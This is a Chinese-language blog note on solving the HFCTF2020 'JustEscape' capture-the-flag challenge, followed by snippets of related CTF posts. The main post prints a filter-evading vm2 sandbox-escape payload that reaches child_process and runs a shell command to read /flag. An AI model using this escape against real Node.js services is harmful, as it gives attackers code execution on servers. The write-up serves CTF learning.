[HFCTF2020]JustEscape 记录

最新推荐文章于 2023-07-16 20:13:15 发布
最新推荐文章于 2023-07-16 20:13:15 发布
阅读量1.8k 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sopromeo/article/details/108629520
版权

最近开学一堆屁事,电脑 又发疯。。。
佛了

本篇为本人记录,并不是详情题解
在这里插入图片描述
抓个包瞅瞅
计算的时候注意将计算符号进行url编码
在这里插入图片描述
再传入new Date()会显示当前时间

直接访问php
在这里插入图片描述
我想搞个system,结果没用

在这里插入图片描述
在这里插入图片描述

回想到题目,猜测js,我就直接搜wp了,js我tm不会
输入Error().stack测试是不是js在这里插入图片描述
在这里插入图片描述
是VM2沙盒逃逸
具体分析在此
vm2逃逸poc
有过滤
利用拼接方式直接打

(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return proc`}ess`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_pro`}cess`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()
penson by 小乌
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 936
CTFHub技能树-web-ssrf
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 6万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
just_escape解题记录
qq_43936524的博客
05-19 389
完全没有写过Nodejs,这题也算是Nodejs的第一次入门,首先安装环境。 安装环境 Node.js安装及环境配置之Windows篇 然后看下大佬们所说的考点 vm.js 沙箱逃逸与过滤绕过 JavaScript 模板字符串 什么是vm 通过这篇文章简单理解下nodejs中的虚拟机概念。nodejs虚拟机 虚拟机可以看做一个上下文环境,而所有的函数执行都围绕着虚拟机中的变量来进行,不会影响到虚拟机外部的内容。 runInContext const vm = require('vm') const sa
BUUCTF-JustEscape
最新发布
shawdow_bug的博客
07-16 335
Node.js 题目-- 沙盒绕过
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 1577
三星难度Web题 afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
[HFCTF2020]JustEscape
Yb_140的博客
05-16 239
vm沙箱逃逸
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1
CTF 湖湘杯 决赛 2021 final.zip
12-07
CTF 湖湘杯 决赛 2021 final
编译器前端cpp示例代码
11-19
编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码
hfctf_2020_marksman
z1r0的博客
03-20 528
hfctf_2020_marksman 查看保护 这里输入地址,然后改这个地址的低三个字节,也就是任意地址写三字节 攻击思路:这里最关键是需要劫持哪一个地址然后跳转到哪一个gadget。 为什么会说跳转到哪一个gadget? 在这个函数中会将一些gadget给禁用掉,举第一个例子 可以看到这个gadget被禁用了。 1.首先题目给了puts的地址。拿到Libc 2.写入要覆盖的地址,这里可以选择libc的got地址(这里笔者也学到了.got.plt一般是可写的,查看保护看的只是got表不可写而已,笔
hfctf_2020_marksman(劫持exit_hook或dlopen)
tbsqigongzi的博客
08-12 1043
劫持exit_hook或dlopen
HFCTF2020 web writeup
a3320315的博客
04-21 3051
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
实验吧CTF逆向题目Just Click题解
iqiqiya的博客
12-29 1252
题目如下: 运行程序: 结合第一张题目提示已经能够猜到 是按一定的顺序点击1,2,3,4四个按钮就好 先来查下壳 这是个什么鬼 没见过的壳 我再试试  发现是.NET的程序 那就上这个  随便点开几个看看 结果发现关键代码 发现这个数组后 没看代码 直接按照刚才想的按顺序点击1,3,4,2,1,2,3,4 就得到了flag
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 473
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
HFCTF2021复现
as you know, nlp is fantasitc!
03-16 1099
[HFCTF2021 Quals]Unsetme 1、F3框架,unset将参数a拼接进去,可以闭合 2、测试 ​ payload ?a=a%0a);%0aphpinfo( 3、读取flag ?a=a%0a);%0aecho file_get_contents(%27/flag%27 [HFCTF 2021 Final]easyflask 1、源码,很明显的pickle反序列化 pickle官方文档 #!/usr/bin/python3.6 import os import pickle fro

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值